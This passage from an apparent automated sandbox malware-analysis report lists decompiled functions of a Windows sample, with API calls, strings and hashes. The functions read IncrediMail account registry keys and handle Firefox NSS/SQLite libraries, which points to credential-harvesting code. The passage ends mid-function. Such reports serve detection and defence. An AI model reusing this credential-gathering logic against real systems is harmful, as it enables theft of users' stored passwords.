                                                                                              0x0040301a
                                                                                              0x00403101
                                                                                              0x0040303a
                                                                                              0x0040304c
                                                                                              0x00403052
                                                                                              0x0040306a
                                                                                              0x0040307d
                                                                                              0x00403082
                                                                                              0x00403087
                                                                                              0x00403092
                                                                                              0x00403095
                                                                                              0x0040309b
                                                                                              0x004030ab
                                                                                              0x004030b0
                                                                                              0x004030dc
                                                                                              0x004030bf
                                                                                              0x004030c4
                                                                                              0x004030d4
                                                                                              0x004030d9
                                                                                              0x004030d9
                                                                                              0x004030e3
                                                                                              0x004030e3
                                                                                              0x004030e9
                                                                                              0x004030f9
                                                                                              0x004030fe
                                                                                              0x004030fe
                                                                                              0x0040310c
                                                                                              0x00403112
                                                                                              0x00403113
                                                                                              0x0040311c

                                                                                              APIs
                                                                                                • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                              • memset.MSVCRT ref: 00403005
                                                                                                • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                                                              • memset.MSVCRT ref: 00403052
                                                                                              • sprintf.MSVCRT ref: 0040306A
                                                                                              • memset.MSVCRT ref: 0040309B
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004030E3
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0040310C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$Close$EnumOpensprintf
                                                                                              • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                                                              • API String ID: 3672803090-3168940695
                                                                                              • Opcode ID: 0cf548ca034e9c156653f3b1dbb9e895c43ca7fac2608918d84bd2d804a0d0b2
                                                                                              • Instruction ID: 2ec2bfd25db4f87ede08292043277b4916c0dadc31aa5cf960337fea200e46ca
                                                                                              • Opcode Fuzzy Hash: 0cf548ca034e9c156653f3b1dbb9e895c43ca7fac2608918d84bd2d804a0d0b2
                                                                                              • Instruction Fuzzy Hash: D6314EB290021CBADB11EB95CC81EEEBB7CAF14344F0041B6B909A1051E7799F948F64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00407A64, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowstringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 48%
                                                                                              			E00407A64(void* __ecx, void* __eflags, int _a4, struct tagMENUITEMINFOA _a8, intOrPtr _a12, int _a24, intOrPtr _a28, char* _a44, int _a48, char _a56, void _a57, char _a4160, void _a4161) {
				char* _v0;
				int _v4;
				int _t39;
				char* _t49;
				void* _t51;
				int _t64;
				signed int _t70;
				signed int _t71;

				_t59 = __ecx;
				_t71 = _t70 & 0xfffffff8;
				E004118A0(0x204c, __ecx);
				_t39 = GetMenuItemCount(_a8.cbSize);
				_a4 = _t39;
				_v4 = 0;
				if(_t39 <= 0) {
					L15:
					return _t39;
				} else {
					do {
						memset( &_a57, 0, 0x1000);
						_t71 = _t71 + 0xc;
						_a44 =  &_a56;
						_a8.cbSize = 0x30;
						_a12 = 0x36;
						_a48 = 0x1000;
						_a56 = 0;
						if(GetMenuItemInfoA(_a8.cbSize, _v4, 1,  &_a8) == 0) {
							goto L14;
						}
						if(_a56 == 0) {
							L12:
							_t80 = _a28;
							if(_a28 != 0) {
								_push(0);
								_push(_a28);
								_push(_a4);
								E00407A64(_t59, _t80);
								_t71 = _t71 + 0xc;
							}
							goto L14;
						}
						_t64 = _a24;
						_a4160 = 0;
						memset( &_a4161, 0, 0x1000);
						_t49 = strchr( &_a56, 9);
						_t71 = _t71 + 0x14;
						_v0 = _t49;
						if(_a28 != 0) {
							if(_a12 == 0) {
								 *0x4171b4 =  *0x4171b4 + 1;
								_t64 =  *0x4171b4 + 0x11558;
								__eflags = _t64;
							} else {
								_t64 = _v4 + 0x11171;
							}
						}
						_t51 = E00407D89(_t64,  &_a4160);
						_pop(_t59);
						if(_t51 != 0) {
							if(_v0 != 0) {
								strcat( &_a4160, _v0);
								_pop(_t59);
							}
							ModifyMenuA(_a8, _v4, 0x400, _t64,  &_a4160);
						}
						goto L12;
						L14:
						_v4 = _v4 + 1;
						_t39 = _v4;
					} while (_t39 < _a4);
					goto L15;
				}
			}











                                                                                              0x00407a64
                                                                                              0x00407a67
                                                                                              0x00407a6f
                                                                                              0x00407a7a
                                                                                              0x00407a84
                                                                                              0x00407a88
                                                                                              0x00407a8c
                                                                                              0x00407bb2
                                                                                              0x00407bb8
                                                                                              0x00407a92
                                                                                              0x00407a97
                                                                                              0x00407a9e
                                                                                              0x00407aa3
                                                                                              0x00407aaa
                                                                                              0x00407ab9
                                                                                              0x00407ac4
                                                                                              0x00407acc
                                                                                              0x00407ad0
                                                                                              0x00407adc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407ae6
                                                                                              0x00407b8a
                                                                                              0x00407b8a
                                                                                              0x00407b8e
                                                                                              0x00407b90
                                                                                              0x00407b91
                                                                                              0x00407b95
                                                                                              0x00407b98
                                                                                              0x00407b9d
                                                                                              0x00407b9d
                                                                                              0x00000000
                                                                                              0x00407b8e
                                                                                              0x00407aec
                                                                                              0x00407afa
                                                                                              0x00407b01
                                                                                              0x00407b0d
                                                                                              0x00407b12
                                                                                              0x00407b19
                                                                                              0x00407b1d
                                                                                              0x00407b22
                                                                                              0x00407b30
                                                                                              0x00407b3c
                                                                                              0x00407b3c
                                                                                              0x00407b24
                                                                                              0x00407b28
                                                                                              0x00407b28
                                                                                              0x00407b22
                                                                                              0x00407b4b
                                                                                              0x00407b53
                                                                                              0x00407b54
                                                                                              0x00407b5a
                                                                                              0x00407b68
                                                                                              0x00407b6e
                                                                                              0x00407b6e
                                                                                              0x00407b84
                                                                                              0x00407b84
                                                                                              0x00000000
                                                                                              0x00407ba0
                                                                                              0x00407ba0
                                                                                              0x00407ba4
                                                                                              0x00407ba8
                                                                                              0x00000000
                                                                                              0x00407a97

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Menu$Itemmemset$CountInfoModifystrcatstrchr
                                                                                              • String ID: 0$6
                                                                                              • API String ID: 1757351179-3849865405
                                                                                              • Opcode ID: 0312b36b69dc19ec32793f3e1a4e0bacee62623ae2581f679c82ae12aac676fd
                                                                                              • Instruction ID: 1677788af10e21d8d50b2ad3b046da146c202dfcbfc60db105475917acddfa9f
                                                                                              • Opcode Fuzzy Hash: 0312b36b69dc19ec32793f3e1a4e0bacee62623ae2581f679c82ae12aac676fd
                                                                                              • Instruction Fuzzy Hash: 1A316D71808385AFD7109F55D84099BBBF9EB84358F14883FFA9492250D378EA44CF6B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E988, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 64COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9A5
                                                                                              • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9B9
                                                                                              • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040E9C6
                                                                                              • memcpy.MSVCRT ref: 0040EA04
                                                                                              • CoTaskMemFree.OLE32(00000000,00000000), ref: 0040EA13
                                                                                              Strings
                                                                                              • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0040E9C1
                                                                                              • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9B4
                                                                                              • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9AD
                                                                                              • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                              • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                              • API String ID: 1640410171-2022683286
                                                                                              • Opcode ID: 1c07360da451655baf40f8404e5edb4d1d178eda86dac3c95faae550bb755c51
                                                                                              • Instruction ID: a0dda8305716182b94471eb279f6daf9a8f1529c8f3e89cbb35285eb134eabf6
                                                                                              • Opcode Fuzzy Hash: 1c07360da451655baf40f8404e5edb4d1d178eda86dac3c95faae550bb755c51
                                                                                              • Instruction Fuzzy Hash: 3811607251412DAACB11EEA5DD40EEB37ECAB48354F044837FD12F3241F674E9248BA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404837, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 58%
                                                                                              			E00404837(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryA("comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxA(_t6, "Error: Cannot load the common control classes.", "Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}










                                                                                              0x00404844
                                                                                              0x0040484b
                                                                                              0x00404852
                                                                                              0x00404854
                                                                                              0x0040485c
                                                                                              0x00404860
                                                                                              0x0040488a
                                                                                              0x0040488a
                                                                                              0x00404892
                                                                                              0x00404893
                                                                                              0x00404898
                                                                                              0x004048b5
                                                                                              0x0040489a
                                                                                              0x004048a7
                                                                                              0x004048b0
                                                                                              0x004048b0
                                                                                              0x00404898
                                                                                              0x00404868
                                                                                              0x00404870
                                                                                              0x00404876
                                                                                              0x00404879
                                                                                              0x00404879
                                                                                              0x0040487c
                                                                                              0x00404884
                                                                                              0x00000000
                                                                                              0x00404886
                                                                                              0x00404886
                                                                                              0x00000000
                                                                                              0x00404886

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(comctl32.dll,75144DE0,?,00000000,?,?,?,0040B9C9,75144DE0), ref: 00404856
                                                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404868
                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040B9C9,75144DE0), ref: 0040487C
                                                                                              • #17.COMCTL32(?,00000000,?,?,?,0040B9C9,75144DE0), ref: 0040488A
                                                                                              • MessageBoxA.USER32 ref: 004048A7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                              • API String ID: 2780580303-317687271
                                                                                              • Opcode ID: d22177ebd0c61848c13c07c1ee885c4d1d7d21c72c3c38fe6be86b3f4f770b99
                                                                                              • Instruction ID: 848b23aeb75660b77c3c697252adc3032e5e70f3caa3a854567a53d2e3e71345
                                                                                              • Opcode Fuzzy Hash: d22177ebd0c61848c13c07c1ee885c4d1d7d21c72c3c38fe6be86b3f4f770b99
                                                                                              • Instruction Fuzzy Hash: 3E0126723102017FD7156BA08D48BAF7AACEB84749F008139F602E21C0EBF8C912D6AC
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004081B5, Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 42stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 88%
                                                                                              			E004081B5(void* __eflags, char* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E0040614B(_a4);
				if(_t3 != 0) {
					strcpy(0x4171b8, _a4);
					strcpy(0x4172c0, "general");
					_t6 = GetPrivateProfileIntA(0x4172c0, "rtl", 0, 0x4171b8);
					asm("sbb eax, eax");
					 *0x417304 =  ~(_t6 - 1) + 1;
					E00407DC1(0x417308, "charset", 0x3f);
					E00407DC1(0x417348, "TranslatorName", 0x3f);
					return E00407DC1(0x417388, "TranslatorURL", 0xff);
				}
				return _t3;
			}






                                                                                              0x004081b9
                                                                                              0x004081c1
                                                                                              0x004081cf
                                                                                              0x004081df
                                                                                              0x004081f0
                                                                                              0x004081f9
                                                                                              0x00408208
                                                                                              0x0040820d
                                                                                              0x0040821e
                                                                                              0x00000000
                                                                                              0x0040823b
                                                                                              0x0040823c

                                                                                              APIs
                                                                                                • Part of subcall function 0040614B: GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                                                              • strcpy.MSVCRT(004171B8,00000000,00000000,00000000,00408274,00000000,?,00000000,00000104,?), ref: 004081CF
                                                                                              • strcpy.MSVCRT(004172C0,general,004171B8,00000000,00000000,00000000,00408274,00000000,?,00000000,00000104,?), ref: 004081DF
                                                                                              • GetPrivateProfileIntA.KERNEL32 ref: 004081F0
                                                                                                • Part of subcall function 00407DC1: GetPrivateProfileStringA.KERNEL32(004172C0,?,00412466,00417308,?,004171B8), ref: 00407DDC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: PrivateProfilestrcpy$AttributesFileString
                                                                                              • String ID: HsA$TranslatorName$TranslatorURL$charset$general$rtl
                                                                                              • API String ID: 185930432-2094606381
                                                                                              • Opcode ID: 61c3254355be24366bef669af6bb7bd6cca1bcece2790ae3e2dc5a409b7b51f7
                                                                                              • Instruction ID: cb939eedfd3a0989361dc9c28bcf1dbf68e7932df9513b818d47ffc3c6ffa7d5
                                                                                              • Opcode Fuzzy Hash: 61c3254355be24366bef669af6bb7bd6cca1bcece2790ae3e2dc5a409b7b51f7
                                                                                              • Instruction Fuzzy Hash: 07F0F631ED821532DB113A622C03FEA39248FA2B16F04407FBC04B72C3DA7C4A81929E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040DEA9, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 32COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040DEA9() {
				int _t3;
				struct HINSTANCE__* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__* _t9;

				_t6 = GetModuleHandleA("nss3.dll");
				_t5 = GetModuleHandleA("sqlite3.dll");
				_t3 = GetModuleHandleA("mozsqlite3.dll");
				_t9 = _t3;
				if(_t6 != 0) {
					_t3 = FreeLibrary(_t6);
				}
				if(_t5 != 0) {
					_t3 = FreeLibrary(_t5);
				}
				if(_t9 != 0) {
					return FreeLibrary(_t9);
				}
				return _t3;
			}







                                                                                              0x0040debf
                                                                                              0x0040dec8
                                                                                              0x0040deca
                                                                                              0x0040ded4
                                                                                              0x0040ded6
                                                                                              0x0040ded9
                                                                                              0x0040ded9
                                                                                              0x0040dedd
                                                                                              0x0040dee0
                                                                                              0x0040dee0
                                                                                              0x0040dee4
                                                                                              0x00000000
                                                                                              0x0040dee7
                                                                                              0x0040deed

                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(nss3.dll,751457D0,?,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEB8
                                                                                              • GetModuleHandleA.KERNEL32(sqlite3.dll,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEC1
                                                                                              • GetModuleHandleA.KERNEL32(mozsqlite3.dll,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DECA
                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DED9
                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEE0
                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEE7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FreeHandleLibraryModule
                                                                                              • String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
                                                                                              • API String ID: 662261464-3550686275
                                                                                              • Opcode ID: 86c3fc2903f606d4177665fb0a5e8ba99052a5cd3e374b4e3edda1da98f7fed5
                                                                                              • Instruction ID: d16a25c46baa9326af0e84a0bffbb5276bbaca378281f61e1b061e0aef5cb77a
                                                                                              • Opcode Fuzzy Hash: 86c3fc2903f606d4177665fb0a5e8ba99052a5cd3e374b4e3edda1da98f7fed5
                                                                                              • Instruction Fuzzy Hash: 72E0DF62F4132D67892066F19E84DABBE5CC895AE13150033AA00F3240DDE89C058AF8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E172, Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 86%
                                                                                              			E0040E172(char* __edi, char* __esi) {
				void _v267;
				char _v268;
				char* _t15;
				void* _t38;
				char* _t48;

				_t49 = __esi;
				_t48 = __edi;
				if(__esi[1] != 0x3a) {
					_t15 = strchr( &(__esi[2]), 0x3a);
					if(_t15 == 0) {
						_t38 = E004069D2(0, "\\systemroot");
						if(_t38 < 0) {
							if( *__esi != 0x5c) {
								strcpy(__edi, __esi);
							} else {
								_v268 = 0;
								memset( &_v267, 0, 0x104);
								E00406325( &_v268);
								memcpy(__edi,  &_v268, 2);
								__edi[2] = 0;
								strcat(__edi, __esi);
							}
						} else {
							_v268 = 0;
							memset( &_v267, 0, 0x104);
							E00406325( &_v268);
							strcpy(__edi,  &_v268);
							_t8 =  &(_t49[0xb]); // 0xb
							strcat(__edi, _t38 + _t8);
						}
						L11:
						return _t48;
					}
					_push(_t15 - 1);
					L4:
					strcpy(_t48, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}








                                                                                              0x0040e172
                                                                                              0x0040e172
                                                                                              0x0040e17f
                                                                                              0x0040e18a
                                                                                              0x0040e193
                                                                                              0x0040e1b3
                                                                                              0x0040e1b8
                                                                                              0x0040e200
                                                                                              0x0040e249
                                                                                              0x0040e202
                                                                                              0x0040e210
                                                                                              0x0040e217
                                                                                              0x0040e223
                                                                                              0x0040e232
                                                                                              0x0040e239
                                                                                              0x0040e23d
                                                                                              0x0040e242
                                                                                              0x0040e1ba
                                                                                              0x0040e1c8
                                                                                              0x0040e1cf
                                                                                              0x0040e1db
                                                                                              0x0040e1e8
                                                                                              0x0040e1ed
                                                                                              0x0040e1f3
                                                                                              0x0040e1f8
                                                                                              0x0040e251
                                                                                              0x0040e254
                                                                                              0x0040e254
                                                                                              0x0040e196
                                                                                              0x0040e197
                                                                                              0x0040e198
                                                                                              0x00000000
                                                                                              0x0040e19e
                                                                                              0x0040e181
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • strchr.MSVCRT ref: 0040E18A
                                                                                              • strcpy.MSVCRT(?,-00000001), ref: 0040E198
                                                                                                • Part of subcall function 004069D2: strlen.MSVCRT ref: 004069E4
                                                                                                • Part of subcall function 004069D2: strlen.MSVCRT ref: 004069EC
                                                                                                • Part of subcall function 004069D2: _memicmp.MSVCRT ref: 00406A0A
                                                                                              • strcpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E1E8
                                                                                              • strcat.MSVCRT(?,0000000B,?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E1F3
                                                                                              • memset.MSVCRT ref: 0040E1CF
                                                                                                • Part of subcall function 00406325: GetWindowsDirectoryA.KERNEL32(00417550,00000104,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040633A
                                                                                                • Part of subcall function 00406325: strcpy.MSVCRT(00000000,00417550,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040634A
                                                                                              • memset.MSVCRT ref: 0040E217
                                                                                              • memcpy.MSVCRT ref: 0040E232
                                                                                              • strcat.MSVCRT(?,?,?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0040E23D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strcpy$memsetstrcatstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                              • String ID: \systemroot
                                                                                              • API String ID: 1680921474-1821301763
                                                                                              • Opcode ID: 5187f8535ecd07f80173756fca004a5de43faed2157158ac4ad04829d081b859
                                                                                              • Instruction ID: c94fb6c7bd1247ab7199cb5b48e8c216c8115a4167fd8e2fb1b5c3c0fa66e4da
                                                                                              • Opcode Fuzzy Hash: 5187f8535ecd07f80173756fca004a5de43faed2157158ac4ad04829d081b859
                                                                                              • Instruction Fuzzy Hash: 7021F97554C20879E720A3635C82FEA77DC9F55348F5008AFF6CAA10C1EABC96D5862A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405BE4, Relevance: 15.1, APIs: 10, Instructions: 63windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 67%
                                                                                              			E00405BE4(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
				void* __esi;
				intOrPtr* _t27;
				void* _t30;
				struct HWND__* _t32;
				void* _t35;
				intOrPtr* _t36;

				_t30 = __edx;
				_t27 = __ecx;
				_push(__ebx);
				_push(__edi);
				_t32 =  *(__ecx + 4);
				_t35 = __ecx + 0xc;
				 *(_t35 + 0x10) = _t32;
				GetClientRect(_t32, _t35 + 0xa14);
				 *(_t35 + 0xa24) =  *(_t35 + 0xa24) & 0x00000000;
				GetWindow(GetWindow(_t32, 5), 0);
				do {
					__eax = E00401657(__edi, __esi);
					__edi = GetWindow(__edi, 2);
				} while (__edi != 0);
				__esi = GetDlgItem;
				__edi = 0x3ed;
				GetDlgItem( *(__ebx + 4), 0x3ed) = E0040F037(__eax);
				 *__esp = 0x3ee;
				GetDlgItem(??, ??) = E0040F037(__eax);
				 *__esp = 0x3ef;
				GetDlgItem( *(__ebx + 4),  *(__ebx + 4)) = E0040F037(__eax);
				 *__esp = 0x3f4;
				GetDlgItem( *(__ebx + 4), ??) = E0040F037(__eax);
				__eax =  *(__ebx + 4);
				GetDlgItem( *(__ebx + 4), 0x3ed) = SetFocus(__eax);
				_pop(__edi);
				_pop(__esi);
				__ecx = __ebx;
				_pop(__ebx);
				_t36 = _t27;
				 *((intOrPtr*)( *_t36 + 4))(1, _t35);
				 *((intOrPtr*)( *_t36 + 0x18))();
				E00406491(_t30,  *((intOrPtr*)(_t36 + 4)));
				return 0;
			}









                                                                                              0x00405be4
                                                                                              0x00405be4
                                                                                              0x00405be4
                                                                                              0x00405be9
                                                                                              0x00405bea
                                                                                              0x00405bed
                                                                                              0x00405bf8
                                                                                              0x00405bfb
                                                                                              0x00405c07
                                                                                              0x00405c16
                                                                                              0x00405c1a
                                                                                              0x00405c1a
                                                                                              0x00405c24
                                                                                              0x00405c26
                                                                                              0x00405c2a
                                                                                              0x00405c30
                                                                                              0x00405c3c
                                                                                              0x00405c41
                                                                                              0x00405c4e
                                                                                              0x00405c53
                                                                                              0x00405c60
                                                                                              0x00405c65
                                                                                              0x00405c72
                                                                                              0x00405c77
                                                                                              0x00405c80
                                                                                              0x00405c86
                                                                                              0x00405c87
                                                                                              0x00405c89
                                                                                              0x00405c8b
                                                                                              0x0040163a
                                                                                              0x00401640
                                                                                              0x00401647
                                                                                              0x0040164d
                                                                                              0x00401656

                                                                                              APIs
                                                                                              • GetClientRect.USER32 ref: 00405BFB
                                                                                              • GetWindow.USER32(?,00000005), ref: 00405C13
                                                                                              • GetWindow.USER32(00000000), ref: 00405C16
                                                                                                • Part of subcall function 00401657: GetWindowRect.USER32 ref: 00401666
                                                                                                • Part of subcall function 00401657: MapWindowPoints.USER32 ref: 00401681
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00405C22
                                                                                              • GetDlgItem.USER32 ref: 00405C39
                                                                                              • GetDlgItem.USER32 ref: 00405C4B
                                                                                              • GetDlgItem.USER32 ref: 00405C5D
                                                                                              • GetDlgItem.USER32 ref: 00405C6F
                                                                                              • GetDlgItem.USER32 ref: 00405C7D
                                                                                              • SetFocus.USER32(00000000), ref: 00405C80
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ItemWindow$Rect$ClientFocusPoints
                                                                                              • String ID:
                                                                                              • API String ID: 2187283481-0
                                                                                              • Opcode ID: d2f13065a0daf7b94e2d6602c1ebad63a970ca7fe2c26cba6661fff7476f23c3
                                                                                              • Instruction ID: 7666b00b3ddace13e8d54cd994e266c410995bf231072ec337e33f1596805ccb
                                                                                              • Opcode Fuzzy Hash: d2f13065a0daf7b94e2d6602c1ebad63a970ca7fe2c26cba6661fff7476f23c3
                                                                                              • Instruction Fuzzy Hash: 1A115471500304ABDB116F25CD49E6BBFADDF41758F05843AF544AB591CB79D8028A68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401A50, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 92%
                                                                                              			E00401A50(char* __edi, int __fp0) {
				void* _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				int _v28;
				int _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				void* _v60;
				char _v64;
				int _t79;
				intOrPtr _t80;
				int _t81;
				signed int _t94;
				int _t98;
				int _t100;
				void* _t104;
				void* _t106;
				intOrPtr _t115;
				char _t117;
				char* _t118;
				void* _t119;
				void* _t120;
				int _t122;
				signed int _t123;
				int* _t125;
				int _t159;
				int _t165;

				_t159 = __fp0;
				_t118 = __edi;
				_t125 = (_t123 & 0xfffffff8) - 0x40;
				_t79 = strlen(__edi);
				asm("fldz");
				_t104 = 0;
				_v28 = __fp0;
				_t120 = 0;
				_t106 = _t119;
				_v36 = _t79;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				_v60 = 0;
				_v40 = 0;
				_v12 = 0x20;
				_v20 = 0;
				_v8 = 0;
				_v16 = 0;
				if(_t79 > 0) {
					do {
						_t117 =  *((intOrPtr*)(_t120 + _t118));
						_v64 = _t117;
						if(_t117 - 0x41 <= 0x19) {
							_v56 = _v56 + 1;
						}
						if(_t117 - 0x61 <= 0x19) {
							_v52 = _v52 + 1;
						}
						if(_t117 - 0x30 <= 9) {
							_v48 = _v48 + 1;
						}
						if(_t117 - 0x20 <= 0xf) {
							_v44 = _v44 + 1;
						}
						if(_t117 - 0x3a <= 6) {
							_v60 = _v60 + 1;
						}
						if(_t117 - 0x5b <= 5) {
							_v60 = _v60 + 1;
						}
						if(_t117 < 0x7b) {
							L16:
							if(_t117 > 0x7e) {
								goto L17;
							}
						} else {
							if(_t117 > 0x7e) {
								L17:
								_v40 = _v40 + 1;
							} else {
								_v60 = _v60 + 1;
								goto L16;
							}
						}
						if(_t120 != _t104) {
							_t94 = 0;
							if(_v8 <= 0) {
								L27:
								_t94 = _t94 | 0xffffffff;
							} else {
								L21:
								L21:
								if(_t94 < 0 || _t94 >= _v8) {
									_t115 = 0;
								} else {
